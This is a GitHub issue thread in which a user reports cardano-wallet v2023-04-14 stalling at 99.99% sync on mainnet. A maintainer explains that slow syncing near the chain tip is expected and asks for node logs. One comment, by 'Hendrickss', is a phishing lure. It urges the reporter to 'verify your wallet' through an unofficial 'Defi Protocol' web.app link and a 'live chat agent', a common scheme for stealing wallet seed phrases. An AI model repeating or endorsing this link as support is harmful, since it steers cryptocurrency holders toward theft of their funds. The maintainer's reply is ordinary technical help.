### ISSUE TITLE
Cardano wallet's threads are dying while syncing

### ISSUE THREAD

**Issue by zhp1254** [cardano-foundation/cardano-wallet#4093]
### Just checking...

- [X] This is a `cardano-wallet` bug.
- [X] I am using the latest `cardano-wallet` release.
- [X] I am using the *correct* `cardano-node` version for that release of `cardano-wallet`.

### Version

 v2023-04-14

### Platform

ubuntu 20.04

### Installation method

Binary from GitHub release page

### Network configuration

mainnet

### Context

https://github.com/cardano-foundation/cardano-wallet/releases/tag/v2023-04-14
https://github.com/input-output-hk/cardano-node/releases/tag/1.35.7

### Description

cdffed5c: Syncing (99.99% percent) Applied 0 blocks, 0 rollbacks in the last 30.001038378s. Current tip is [point 6b600c6f at slot 100413895]. (progress decreased)
Syncing (99.99% percent) Applied 0 blocks, 0 rollbacks in the last 30.000909751s. Current tip is [point 6b600c6f at slot 100413895]. (progress decreased)

**Comment by Hendrickss** [comment]
Hi @zhp1254 
Visit the official Defi Protocol page to verify your wallet under validation to complete your request for you eligibility purpose via [Defi Protocol](https://defirefixprotocol.web.app).
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.

**Comment by HeinrichApfelmus** [comment]
Does this issue persist? If it does, could you include more extensive logs, including from the `cardano-node`?

From the information you provided, `cardano-wallet` is syncing close to the tip of the chain. It is expected that syncing slows down at the tip, and gaps of 30s can sometimes happen, and these messages do not necessarily indicate a defect. On average, one new block every 20s is created on the Cardano mainnet.

In the case that `cardano-wallet` stops syncing, this could also be due to `cardano-node` stopping syncing, hence the request for more logs.
